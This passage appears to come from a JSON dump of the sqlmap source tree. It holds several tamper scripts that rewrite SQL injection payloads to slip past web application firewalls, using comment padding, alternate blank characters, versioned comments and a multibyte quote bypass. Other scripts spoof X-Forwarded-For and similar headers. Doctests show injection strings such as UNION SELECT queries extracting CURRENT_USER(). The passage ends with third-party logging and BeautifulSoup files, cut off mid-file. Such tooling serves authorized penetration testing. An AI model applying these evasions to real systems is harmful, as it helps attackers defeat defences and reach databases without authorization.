    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport os\nimport random\nimport re\nimport string\n\nfrom lib.core.common import singleTimeWarnMessage\nfrom lib.core.compat import xrange\nfrom lib.core.data import kb\nfrom lib.core.enums import DBMS\nfrom lib.core.enums import PRIORITY\nfrom lib.core.settings import IGNORE_SPACE_AFFECTED_KEYWORDS\n\n__priority__ = PRIORITY.LOW\n\ndef dependencies():\n    singleTimeWarnMessage(\"tamper script '%s' is only meant to be run against %s > 5.1.13\" % (os.path.basename(__file__).split(\".\")[0], DBMS.MYSQL))\n\ndef tamper(payload, **kwargs):\n    \"\"\"\n    Replaces (MySQL) instances of space character (' ') with a pound character ('#') followed by a random string and a new line ('\\n')\n\n    Requirement:\n        * MySQL >= 5.1.13\n\n    Tested against:\n        * MySQL 5.1.41\n\n    Notes:\n        * Useful to bypass several web application firewalls\n        * Used during the ModSecurity SQL injection challenge,\n          http://modsecurity.org/demo/challenge.html\n\n    >>> random.seed(0)\n    >>> tamper('1 AND 9227=9227')\n    '1%23RcDKhIr%0AAND%23upgPydUzKpMX%0A%23lgbaxYjWJ%0A9227=9227'\n    \"\"\"\n\n    def process(match):\n        word = match.group('word')\n        randomStr = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in xrange(random.randint(6, 12)))\n\n        if word.upper() in kb.keywords and word.upper() not in IGNORE_SPACE_AFFECTED_KEYWORDS:\n            return match.group().replace(word, \"%s%%23%s%%0A\" % (word, randomStr))\n        else:\n            return match.group()\n\n    retVal = \"\"\n\n    if payload:\n        payload = re.sub(r\"(?<=\\W)(?P<word>[A-Za-z_]+)(?=\\W|\\Z)\", process, payload)\n\n        for i in xrange(len(payload)):\n            if payload[i].isspace():\n                randomStr = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in xrange(random.randint(6, 12)))\n                retVal += \"%%23%s%%0A\" % randomStr\n            elif payload[i] == '#' or payload[i:i + 3] == '-- ':\n                retVal += payload[i:]\n                break\n            else:\n                retVal += payload[i]\n\n    return retVal\n"
  },
  {
    "path": "sqlmap/tamper/space2mssqlblank.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport os\nimport random\n\nfrom lib.core.common import singleTimeWarnMessage\nfrom lib.core.compat import xrange\nfrom lib.core.enums import DBMS\nfrom lib.core.enums import PRIORITY\n\n__priority__ = PRIORITY.LOW\n\ndef dependencies():\n    singleTimeWarnMessage(\"tamper script '%s' is only meant to be run against %s\" % (os.path.basename(__file__).split(\".\")[0], DBMS.MSSQL))\n\ndef tamper(payload, **kwargs):\n    \"\"\"\n    Replaces (MsSQL) instances of space character (' ') with a random blank character from a valid set of alternate characters\n\n    Requirement:\n        * Microsoft SQL Server\n\n    Tested against:\n        * Microsoft SQL Server 2000\n        * Microsoft SQL Server 2005\n\n    Notes:\n        * Useful to bypass several web application firewalls\n\n    >>> random.seed(0)\n    >>> tamper('SELECT id FROM users')\n    'SELECT%0Did%0DFROM%04users'\n    \"\"\"\n\n    # ASCII table:\n    #   SOH     01      start of heading\n    #   STX     02      start of text\n    #   ETX     03      end of text\n    #   EOT     04      end of transmission\n    #   ENQ     05      enquiry\n    #   ACK     06      acknowledge\n    #   BEL     07      bell\n    #   BS      08      backspace\n    #   TAB     09      horizontal tab\n    #   LF      0A      new line\n    #   VT      0B      vertical TAB\n    #   FF      0C      new page\n    #   CR      0D      carriage return\n    #   SO      0E      shift out\n    #   SI      0F      shift in\n    blanks = ('%01', '%02', '%03', '%04', '%05', '%06', '%07', '%08', '%09', '%0B', '%0C', '%0D', '%0E', '%0F', '%0A')\n    retVal = payload\n\n    if payload:\n        retVal = \"\"\n        quote, doublequote, firstspace, end = False, False, False, False\n\n        for i in xrange(len(payload)):\n            if not firstspace:\n                if payload[i].isspace():\n                    firstspace = True\n                    retVal += random.choice(blanks)\n                    continue\n\n            elif payload[i] == '\\'':\n                quote = not quote\n\n            elif payload[i] == '\"':\n                doublequote = not doublequote\n\n            elif payload[i] == '#' or payload[i:i + 3] == '-- ':\n                end = True\n\n            elif payload[i] == \" \" and not doublequote and not quote:\n                if end:\n                    retVal += random.choice(blanks[:-1])\n                else:\n                    retVal += random.choice(blanks)\n\n                continue\n\n            retVal += payload[i]\n\n    return retVal\n"
  },
  {
    "path": "sqlmap/tamper/space2mssqlhash.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.compat import xrange\nfrom lib.core.enums import PRIORITY\n\n__priority__ = PRIORITY.LOW\n\ndef tamper(payload, **kwargs):\n    \"\"\"\n    Replaces space character (' ') with a pound character ('#') followed by a new line ('\\n')\n\n    Requirement:\n        * MSSQL\n        * MySQL\n\n    Notes:\n        * Useful to bypass several web application firewalls\n\n    >>> tamper('1 AND 9227=9227')\n    '1%23%0AAND%23%0A9227=9227'\n    \"\"\"\n\n    retVal = \"\"\n\n    if payload:\n        for i in xrange(len(payload)):\n            if payload[i].isspace():\n                retVal += \"%23%0A\"\n            elif payload[i] == '#' or payload[i:i + 3] == '-- ':\n                retVal += payload[i:]\n                break\n            else:\n                retVal += payload[i]\n\n    return retVal\n"
  },
  {
    "path": "sqlmap/tamper/space2mysqlblank.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport os\nimport random\n\nfrom lib.core.common import singleTimeWarnMessage\nfrom lib.core.compat import xrange\nfrom lib.core.enums import DBMS\nfrom lib.core.enums import PRIORITY\n\n__priority__ = PRIORITY.LOW\n\ndef dependencies():\n    singleTimeWarnMessage(\"tamper script '%s' is only meant to be run against %s\" % (os.path.basename(__file__).split(\".\")[0], DBMS.MYSQL))\n\ndef tamper(payload, **kwargs):\n    \"\"\"\n    Replaces (MySQL) instances of space character (' ') with a random blank character from a valid set of alternate characters\n\n    Requirement:\n        * MySQL\n\n    Tested against:\n        * MySQL 5.1\n\n    Notes:\n        * Useful to bypass several web application firewalls\n\n    >>> random.seed(0)\n    >>> tamper('SELECT id FROM users')\n    'SELECT%A0id%0CFROM%0Dusers'\n    \"\"\"\n\n    # ASCII table:\n    #   TAB     09      horizontal TAB\n    #   LF      0A      new line\n    #   FF      0C      new page\n    #   CR      0D      carriage return\n    #   VT      0B      vertical TAB        (MySQL and Microsoft SQL Server only)\n    #           A0      non-breaking space\n    blanks = ('%09', '%0A', '%0C', '%0D', '%0B', '%A0')\n    retVal = payload\n\n    if payload:\n        retVal = \"\"\n        quote, doublequote, firstspace = False, False, False\n\n        for i in xrange(len(payload)):\n            if not firstspace:\n                if payload[i].isspace():\n                    firstspace = True\n                    retVal += random.choice(blanks)\n                    continue\n\n            elif payload[i] == '\\'':\n                quote = not quote\n\n            elif payload[i] == '\"':\n                doublequote = not doublequote\n\n            elif payload[i] == \" \" and not doublequote and not quote:\n                retVal += random.choice(blanks)\n                continue\n\n            retVal += payload[i]\n\n    return retVal\n"
  },
  {
    "path": "sqlmap/tamper/space2mysqldash.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport os\n\nfrom lib.core.common import singleTimeWarnMessage\nfrom lib.core.compat import xrange\nfrom lib.core.enums import DBMS\nfrom lib.core.enums import PRIORITY\n\n__priority__ = PRIORITY.LOW\n\ndef dependencies():\n    singleTimeWarnMessage(\"tamper script '%s' is only meant to be run against %s\" % (os.path.basename(__file__).split(\".\")[0], DBMS.MYSQL))\n\ndef tamper(payload, **kwargs):\n    \"\"\"\n    Replaces space character (' ') with a dash comment ('--') followed by a new line ('\\n')\n\n    Requirement:\n        * MySQL\n        * MSSQL\n\n    Notes:\n        * Useful to bypass several web application firewalls.\n\n    >>> tamper('1 AND 9227=9227')\n    '1--%0AAND--%0A9227=9227'\n    \"\"\"\n\n    retVal = \"\"\n\n    if payload:\n        for i in xrange(len(payload)):\n            if payload[i].isspace():\n                retVal += \"--%0A\"\n            elif payload[i] == '#' or payload[i:i + 3] == '-- ':\n                retVal += payload[i:]\n                break\n            else:\n                retVal += payload[i]\n\n    return retVal\n"
  },
  {
    "path": "sqlmap/tamper/space2plus.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.compat import xrange\nfrom lib.core.enums import PRIORITY\n\n__priority__ = PRIORITY.LOW\n\ndef dependencies():\n    pass\n\ndef tamper(payload, **kwargs):\n    \"\"\"\n    Replaces space character (' ') with plus ('+')\n\n    Notes:\n        * Is this any useful? The plus get's url-encoded by sqlmap engine invalidating the query afterwards\n        * This tamper script works against all databases\n\n    >>> tamper('SELECT id FROM users')\n    'SELECT+id+FROM+users'\n    \"\"\"\n\n    retVal = payload\n\n    if payload:\n        retVal = \"\"\n        quote, doublequote, firstspace = False, False, False\n\n        for i in xrange(len(payload)):\n            if not firstspace:\n                if payload[i].isspace():\n                    firstspace = True\n                    retVal += \"+\"\n                    continue\n\n            elif payload[i] == '\\'':\n                quote = not quote\n\n            elif payload[i] == '\"':\n                doublequote = not doublequote\n\n            elif payload[i] == \" \" and not doublequote and not quote:\n                retVal += \"+\"\n                continue\n\n            retVal += payload[i]\n\n    return retVal\n"
  },
  {
    "path": "sqlmap/tamper/space2randomblank.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport random\n\nfrom lib.core.compat import xrange\nfrom lib.core.enums import PRIORITY\n\n__priority__ = PRIORITY.LOW\n\ndef dependencies():\n    pass\n\ndef tamper(payload, **kwargs):\n    \"\"\"\n    Replaces space character (' ') with a random blank character from a valid set of alternate characters\n\n    Tested against:\n        * Microsoft SQL Server 2005\n        * MySQL 4, 5.0 and 5.5\n        * Oracle 10g\n        * PostgreSQL 8.3, 8.4, 9.0\n\n    Notes:\n        * Useful to bypass several web application firewalls\n\n    >>> random.seed(0)\n    >>> tamper('SELECT id FROM users')\n    'SELECT%0Did%0CFROM%0Ausers'\n    \"\"\"\n\n    # ASCII table:\n    #   TAB     09      horizontal TAB\n    #   LF      0A      new line\n    #   FF      0C      new page\n    #   CR      0D      carriage return\n    blanks = (\"%09\", \"%0A\", \"%0C\", \"%0D\")\n    retVal = payload\n\n    if payload:\n        retVal = \"\"\n        quote, doublequote, firstspace = False, False, False\n\n        for i in xrange(len(payload)):\n            if not firstspace:\n                if payload[i].isspace():\n                    firstspace = True\n                    retVal += random.choice(blanks)\n                    continue\n\n            elif payload[i] == '\\'':\n                quote = not quote\n\n            elif payload[i] == '\"':\n                doublequote = not doublequote\n\n            elif payload[i] == ' ' and not doublequote and not quote:\n                retVal += random.choice(blanks)\n                continue\n\n            retVal += payload[i]\n\n    return retVal\n"
  },
  {
    "path": "sqlmap/tamper/substring2leftright.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport re\n\nfrom lib.core.enums import PRIORITY\n\n__priority__ = PRIORITY.NORMAL\n\ndef dependencies():\n    pass\n\ndef tamper(payload, **kwargs):\n    \"\"\"\n    Replaces PostgreSQL SUBSTRING with LEFT and RIGHT\n\n    Tested against:\n        * PostgreSQL 9.6.12\n\n    Note:\n        * Useful to bypass weak web application firewalls that filter SUBSTRING (but not LEFT and RIGHT)\n\n    >>> tamper('SUBSTRING((SELECT usename FROM pg_user)::text FROM 1 FOR 1)')\n    'LEFT((SELECT usename FROM pg_user)::text,1)'\n    >>> tamper('SUBSTRING((SELECT usename FROM pg_user)::text FROM 3 FOR 1)')\n    'LEFT(RIGHT((SELECT usename FROM pg_user)::text,-2),1)'\n    \"\"\"\n\n    retVal = payload\n\n    if payload:\n        match = re.search(r\"SUBSTRING\\((.+?)\\s+FROM[^)]+(\\d+)[^)]+FOR[^)]+1\\)\", payload)\n\n        if match:\n            pos = int(match.group(2))\n            if pos == 1:\n                _ = \"LEFT(%s,1)\" % (match.group(1))\n            else:\n                _ = \"LEFT(RIGHT(%s,%d),1)\" % (match.group(1), 1 - pos)\n\n            retVal = retVal.replace(match.group(0), _)\n\n    return retVal\n"
  },
  {
    "path": "sqlmap/tamper/symboliclogical.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport re\n\nfrom lib.core.enums import PRIORITY\n\n__priority__ = PRIORITY.LOWEST\n\ndef dependencies():\n    pass\n\ndef tamper(payload, **kwargs):\n    \"\"\"\n    Replaces AND and OR logical operators with their symbolic counterparts (&& and ||)\n\n    >>> tamper(\"1 AND '1'='1\")\n    \"1 %26%26 '1'='1\"\n    \"\"\"\n\n    retVal = payload\n\n    if payload:\n        retVal = re.sub(r\"(?i)\\bAND\\b\", \"%26%26\", re.sub(r\"(?i)\\bOR\\b\", \"%7C%7C\", payload))\n\n    return retVal\n"
  },
  {
    "path": "sqlmap/tamper/unionalltounion.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.enums import PRIORITY\n\n__priority__ = PRIORITY.HIGHEST\n\ndef dependencies():\n    pass\n\ndef tamper(payload, **kwargs):\n    \"\"\"\n    Replaces instances of UNION ALL SELECT with UNION SELECT counterpart\n\n    >>> tamper('-1 UNION ALL SELECT')\n    '-1 UNION SELECT'\n    \"\"\"\n\n    return payload.replace(\"UNION ALL SELECT\", \"UNION SELECT\") if payload else payload\n"
  },
  {
    "path": "sqlmap/tamper/unmagicquotes.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport re\n\nfrom lib.core.compat import xrange\nfrom lib.core.enums import PRIORITY\n\n__priority__ = PRIORITY.NORMAL\n\ndef dependencies():\n    pass\n\ndef tamper(payload, **kwargs):\n    \"\"\"\n    Replaces quote character (') with a multi-byte combo %BF%27 together with generic comment at the end (to make it work)\n\n    Notes:\n        * Useful for bypassing magic_quotes/addslashes feature\n\n    Reference:\n        * http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string\n\n    >>> tamper(\"1' AND 1=1\")\n    '1%bf%27-- -'\n    \"\"\"\n\n    retVal = payload\n\n    if payload:\n        found = False\n        retVal = \"\"\n\n        for i in xrange(len(payload)):\n            if payload[i] == '\\'' and not found:\n                retVal += \"%bf%27\"\n                found = True\n            else:\n                retVal += payload[i]\n                continue\n\n        if found:\n            _ = re.sub(r\"(?i)\\s*(AND|OR)[\\s(]+([^\\s]+)\\s*(=|LIKE)\\s*\\2\", \"\", retVal)\n            if _ != retVal:\n                retVal = _\n                retVal += \"-- -\"\n            elif not any(_ in retVal for _ in ('#', '--', '/*')):\n                retVal += \"-- -\"\n    return retVal\n"
  },
  {
    "path": "sqlmap/tamper/uppercase.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport re\n\nfrom lib.core.data import kb\nfrom lib.core.enums import PRIORITY\n\n__priority__ = PRIORITY.NORMAL\n\ndef dependencies():\n    pass\n\ndef tamper(payload, **kwargs):\n    \"\"\"\n    Replaces each keyword character with upper case value (e.g. select -> SELECT)\n\n    Tested against:\n        * Microsoft SQL Server 2005\n        * MySQL 4, 5.0 and 5.5\n        * Oracle 10g\n        * PostgreSQL 8.3, 8.4, 9.0\n\n    Notes:\n        * Useful to bypass very weak and bespoke web application firewalls\n          that has poorly written permissive regular expressions\n        * This tamper script should work against all (?) databases\n\n    >>> tamper('insert')\n    'INSERT'\n    \"\"\"\n\n    retVal = payload\n\n    if payload:\n        for match in re.finditer(r\"[A-Za-z_]+\", retVal):\n            word = match.group()\n\n            if word.upper() in kb.keywords:\n                retVal = retVal.replace(word, word.upper())\n\n    return retVal\n"
  },
  {
    "path": "sqlmap/tamper/varnish.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.enums import PRIORITY\n\n__priority__ = PRIORITY.NORMAL\n\ndef dependencies():\n    pass\n\ndef tamper(payload, **kwargs):\n    \"\"\"\n    Appends a HTTP header 'X-originating-IP' to bypass Varnish Firewall\n\n    Reference:\n        * https://web.archive.org/web/20160815052159/http://community.hpe.com/t5/Protect-Your-Assets/Bypassing-web-application-firewalls-using-HTTP-headers/ba-p/6418366\n\n    Notes:\n        Examples:\n        >> X-forwarded-for: TARGET_CACHESERVER_IP (184.189.250.X)\n        >> X-remote-IP: TARGET_PROXY_IP (184.189.250.X)\n        >> X-originating-IP: TARGET_LOCAL_IP (127.0.0.1)\n        >> x-remote-addr: TARGET_INTERNALUSER_IP (192.168.1.X)\n        >> X-remote-IP: * or %00 or %0A\n    \"\"\"\n\n    headers = kwargs.get(\"headers\", {})\n    headers[\"X-originating-IP\"] = \"127.0.0.1\"\n    return payload\n"
  },
  {
    "path": "sqlmap/tamper/versionedkeywords.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport os\nimport re\n\nfrom lib.core.common import singleTimeWarnMessage\nfrom lib.core.data import kb\nfrom lib.core.enums import DBMS\nfrom lib.core.enums import PRIORITY\n\n__priority__ = PRIORITY.HIGHER\n\ndef dependencies():\n    singleTimeWarnMessage(\"tamper script '%s' is only meant to be run against %s\" % (os.path.basename(__file__).split(\".\")[0], DBMS.MYSQL))\n\ndef tamper(payload, **kwargs):\n    \"\"\"\n    Encloses each non-function keyword with (MySQL) versioned comment\n\n    Requirement:\n        * MySQL\n\n    Tested against:\n        * MySQL 4.0.18, 5.1.56, 5.5.11\n\n    Notes:\n        * Useful to bypass several web application firewalls when the\n          back-end database management system is MySQL\n\n    >>> tamper('1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#')\n    '1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#'\n    \"\"\"\n\n    def process(match):\n        word = match.group('word')\n        if word.upper() in kb.keywords:\n            return match.group().replace(word, \"/*!%s*/\" % word)\n        else:\n            return match.group()\n\n    retVal = payload\n\n    if payload:\n        retVal = re.sub(r\"(?<=\\W)(?P<word>[A-Za-z_]+)(?=[^\\w(]|\\Z)\", process, retVal)\n        retVal = retVal.replace(\" /*!\", \"/*!\").replace(\"*/ \", \"*/\")\n\n    return retVal\n"
  },
  {
    "path": "sqlmap/tamper/versionedmorekeywords.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport os\nimport re\n\nfrom lib.core.common import singleTimeWarnMessage\nfrom lib.core.data import kb\nfrom lib.core.enums import DBMS\nfrom lib.core.enums import PRIORITY\nfrom lib.core.settings import IGNORE_SPACE_AFFECTED_KEYWORDS\n\n__priority__ = PRIORITY.HIGHER\n\ndef dependencies():\n    singleTimeWarnMessage(\"tamper script '%s' is only meant to be run against %s >= 5.1.13\" % (os.path.basename(__file__).split(\".\")[0], DBMS.MYSQL))\n\ndef tamper(payload, **kwargs):\n    \"\"\"\n    Encloses each keyword with (MySQL) versioned comment\n\n    Requirement:\n        * MySQL >= 5.1.13\n\n    Tested against:\n        * MySQL 5.1.56, 5.5.11\n\n    Notes:\n        * Useful to bypass several web application firewalls when the\n          back-end database management system is MySQL\n\n    >>> tamper('1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#')\n    '1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#'\n    \"\"\"\n\n    def process(match):\n        word = match.group('word')\n        if word.upper() in kb.keywords and word.upper() not in IGNORE_SPACE_AFFECTED_KEYWORDS:\n            return match.group().replace(word, \"/*!%s*/\" % word)\n        else:\n            return match.group()\n\n    retVal = payload\n\n    if payload:\n        retVal = re.sub(r\"(?<=\\W)(?P<word>[A-Za-z_]+)(?=\\W|\\Z)\", process, retVal)\n        retVal = retVal.replace(\" /*!\", \"/*!\").replace(\"*/ \", \"*/\")\n\n    return retVal\n"
  },
  {
    "path": "sqlmap/tamper/xforwardedfor.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport random\n\nfrom lib.core.compat import xrange\nfrom lib.core.enums import PRIORITY\n\n__priority__ = PRIORITY.NORMAL\n\ndef dependencies():\n    pass\n\ndef randomIP():\n    octets = []\n\n    while not octets or octets[0] in (10, 172, 192):\n        octets = random.sample(xrange(1, 255), 4)\n\n    return '.'.join(str(_) for _ in octets)\n\ndef tamper(payload, **kwargs):\n    \"\"\"\n    Append a fake HTTP header 'X-Forwarded-For' (and alike)\n    \"\"\"\n\n    headers = kwargs.get(\"headers\", {})\n    headers[\"X-Forwarded-For\"] = randomIP()\n    headers[\"X-Client-Ip\"] = randomIP()\n    headers[\"X-Real-Ip\"] = randomIP()\n    headers[\"CF-Connecting-IP\"] = randomIP()\n    headers[\"True-Client-IP\"] = randomIP()\n\n    # Reference: https://developer.chrome.com/multidevice/data-compression-for-isps#proxy-connection\n    headers[\"Via\"] = \"1.1 Chrome-Compression-Proxy\"\n\n    # Reference: https://wordpress.org/support/topic/blocked-country-gaining-access-via-cloudflare/#post-9812007\n    headers[\"CF-IPCountry\"] = random.sample(('GB', 'US', 'FR', 'AU', 'CA', 'NZ', 'BE', 'DK', 'FI', 'IE', 'AT', 'IT', 'LU', 'NL', 'NO', 'PT', 'SE', 'ES', 'CH'), 1)[0]\n\n    return payload\n"
  },
  {
    "path": "sqlmap/thirdparty/__init__.py",
    "content": ""
  },
  {
    "path": "sqlmap/thirdparty/ansistrm/__init__.py",
    "content": ""
  },
  {
    "path": "sqlmap/thirdparty/ansistrm/ansistrm.py",
    "content": "#\n# Copyright (C) 2010-2012 Vinay Sajip. All rights reserved. Licensed under the new BSD license.\n# (Note: 2018 modifications by @stamparm)\n#\n\nimport logging\nimport re\nimport sys\n\nfrom lib.core.settings import IS_WIN\n\nif IS_WIN:\n    import ctypes\n    import ctypes.wintypes\n\n    # Reference: https://gist.github.com/vsajip/758430\n    #            https://github.com/ipython/ipython/issues/4252\n    #            https://msdn.microsoft.com/en-us/library/windows/desktop/ms686047%28v=vs.85%29.aspx\n    ctypes.windll.kernel32.SetConsoleTextAttribute.argtypes = [ctypes.wintypes.HANDLE, ctypes.wintypes.WORD]\n    ctypes.windll.kernel32.SetConsoleTextAttribute.restype = ctypes.wintypes.BOOL\n\ndef stdoutEncode(data):  # Cross-referenced function\n    return data\n\nclass ColorizingStreamHandler(logging.StreamHandler):\n    # color names to indices\n    color_map = {\n        'black': 0,\n        'red': 1,\n        'green': 2,\n        'yellow': 3,\n        'blue': 4,\n        'magenta': 5,\n        'cyan': 6,\n        'white': 7,\n    }\n\n    # levels to (background, foreground, bold/intense)\n    level_map = {\n        logging.DEBUG: (None, 'blue', False),\n        logging.INFO: (None, 'green', False),\n        logging.WARNING: (None, 'yellow', False),\n        logging.ERROR: (None, 'red', False),\n        logging.CRITICAL: ('red', 'white', False)\n    }\n    csi = '\\x1b['\n    reset = '\\x1b[0m'\n    bold = \"\\x1b[1m\"\n    disable_coloring = False\n\n    @property\n    def is_tty(self):\n        isatty = getattr(self.stream, 'isatty', None)\n        return isatty and isatty() and not self.disable_coloring\n\n    def emit(self, record):\n        try:\n            message = stdoutEncode(self.format(record))\n            stream = self.stream\n\n            if not self.is_tty:\n                if message and message[0] == \"\\r\":\n                    message = message[1:]\n                stream.write(message)\n            else:\n                self.output_colorized(message)\n            stream.write(getattr(self, 'terminator', '\\n'))\n\n            self.flush()\n        except (KeyboardInterrupt, SystemExit):\n            raise\n        except IOError:\n            pass\n        except:\n            self.handleError(record)\n\n    if not IS_WIN:\n        def output_colorized(self, message):\n            self.stream.write(message)\n    else:\n        ansi_esc = re.compile(r'\\x1b\\[((?:\\d+)(?:;(?:\\d+))*)m')\n\n        nt_color_map = {\n            0: 0x00,    # black\n            1: 0x04,    # red\n            2: 0x02,    # green\n            3: 0x06,    # yellow\n            4: 0x01,    # blue\n            5: 0x05,    # magenta\n            6: 0x03,    # cyan\n            7: 0x07,    # white\n        }\n\n        def output_colorized(self, message):\n            parts = self.ansi_esc.split(message)\n            h = None\n            fd = getattr(self.stream, 'fileno', None)\n\n            if fd is not None:\n                fd = fd()\n\n                if fd in (1, 2): # stdout or stderr\n                    h = ctypes.windll.kernel32.GetStdHandle(-10 - fd)\n\n            while parts:\n                text = parts.pop(0)\n\n                if text:\n                    self.stream.write(text)\n                    self.stream.flush()\n\n                if parts:\n                    params = parts.pop(0)\n\n                    if h is not None:\n                        params = [int(p) for p in params.split(';')]\n                        color = 0\n\n                        for p in params:\n                            if 40 <= p <= 47:\n                                color |= self.nt_color_map[p - 40] << 4\n                            elif 30 <= p <= 37:\n                                color |= self.nt_color_map[p - 30]\n                            elif p == 1:\n                                color |= 0x08 # foreground intensity on\n                            elif p == 0: # reset to default color\n                                color = 0x07\n                            else:\n                                pass # error condition ignored\n\n                        ctypes.windll.kernel32.SetConsoleTextAttribute(h, color)\n\n    def _reset(self, message):\n        if not message.endswith(self.reset):\n            reset = self.reset\n        elif self.bold in message:  # bold\n            reset = self.reset + self.bold\n        else:\n            reset = self.reset\n\n        return reset\n\n    def colorize(self, message, levelno):\n        if levelno in self.level_map and self.is_tty:\n            bg, fg, bold = self.level_map[levelno]\n            params = []\n\n            if bg in self.color_map:\n                params.append(str(self.color_map[bg] + 40))\n\n            if fg in self.color_map:\n                params.append(str(self.color_map[fg] + 30))\n\n            if bold:\n                params.append('1')\n\n            if params and message:\n                if message.lstrip() != message:\n                    prefix = re.search(r\"\\s+\", message).group(0)\n                    message = message[len(prefix):]\n                else:\n                    prefix = \"\"\n\n                message = \"%s%s\" % (prefix, ''.join((self.csi, ';'.join(params),\n                                   'm', message, self.reset)))\n\n        return message\n\n    def format(self, record):\n        message = logging.StreamHandler.format(self, record)\n        return self.colorize(message, record.levelno)\n"
  },
  {
    "path": "sqlmap/thirdparty/beautifulsoup/__init__.py",
    "content": "#!/usr/bin/env python2\n# \n# Copyright (c) 2004-2010, Leonard Richardson\n# \n# All rights reserved.\n# \n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are\n# met:\n# \n#   * Redistributions of source code must retain the above copyright\n#     notice, this list of conditions and the following disclaimer.\n# \n#   * Redistributions in binary form must reproduce the above\n#     copyright notice, this list of conditions and the following\n#     disclaimer in the documentation and/or other materials provided\n#     with the distribution.\n# \n#   * Neither the name of the the Beautiful Soup Consortium and All\n#     Night Kosher Bakery nor the names of its contributors may be\n#     used to endorse or promote products derived from this software\n#     without specific prior written permission.\n# \n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n# \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR\n# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR\n# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,\n# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,\n# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR\n# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF\n# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING\n# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE, DAMMIT.\n# \n\npass\n"
  },
  {
    "path": "sqlmap/thirdparty/beautifulsoup/beautifulsoup.py",
